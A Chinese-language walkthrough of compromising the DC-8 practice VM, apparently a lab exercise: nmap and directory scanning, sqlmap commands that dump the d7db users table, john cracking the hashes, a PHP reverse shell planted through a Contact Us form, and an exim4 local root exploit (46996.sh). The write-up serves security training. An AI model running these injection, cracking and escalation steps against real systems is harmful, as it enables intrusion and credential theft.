DC-8靶机复现
一、信息收集
1.使用nmap对目标靶机进行扫描:

发现开放了22和80端口先访问一下80端口:

查看一下网站。
2.目录扫描

扫出来很多,发现有robots.txt文件:

查看一下:

发现有登录界面地址,访问一下:

二、漏洞攻击
1.sql注入
发现左列表的连接数这样的 http://192.168.1.136/?nid=1


可以试试sql注入:
sqlmap -u "http://192.168.1.136/?nid=1" --batch

发现可以注入,查看下数据库:
sqlmap -u "http://192.168.1.136/?nid=1" -dbs --batch

爆出d7db数据库的表:
sqlmap -u "http://192.168.1.136/?nid=1" -D d7db --tables --batch

发现users表,爆出usesr表的列:
sqlmap -u "http://192.168.1.136/?nid=1" -D d7db -T users --columns --batch

发现name和pass,查看字段:
sqlmap -u "http://192.168.1.136/?nid=1" -D d7db -T users -C name,pass --dump --batch

发现两个用户,将两个pass字段放入john中进行破解:
john --wordlist=/usr/share/wordlists/rockyou.txt /root/桌面/pass

(扫出来后忘记截图了,john只扫一次,会把结果保存下来)
爆出密码turtle,这样就有了密码,登录到系统:
2.写入反弹shell

john登陆成功,简单查看一下系统发现可以添加新页面:

但是发现john的权限不足,无法写入php文件:

再次寻找发现,Contact Us中有写php文件的地方:

然后写入反弹shell:

在view界面填写数据进行提交,并监听1234端口:

连接成功,升级一下 shell。
三、提权
1.查询可利用漏洞

查看是否有特殊执行的文件:

查看exim4的版本:

查找exim4的漏洞:

查看46996.sh文件:

2.利用提权漏洞
发现提权方法,将此文件复制到/var/www/html/目录下,开启HTTPServer服务:

在反弹shell中下载脚本:切换到tmp目录下下载成功:

对46996.sh文件进行赋权:

文件结束符有错误,将其替换并进行提权:
sed -i -e 's/\r$//' 46996.sh


3.提权到root
提权到root,查看flag:

完成。

浙公网安备 33010602011771号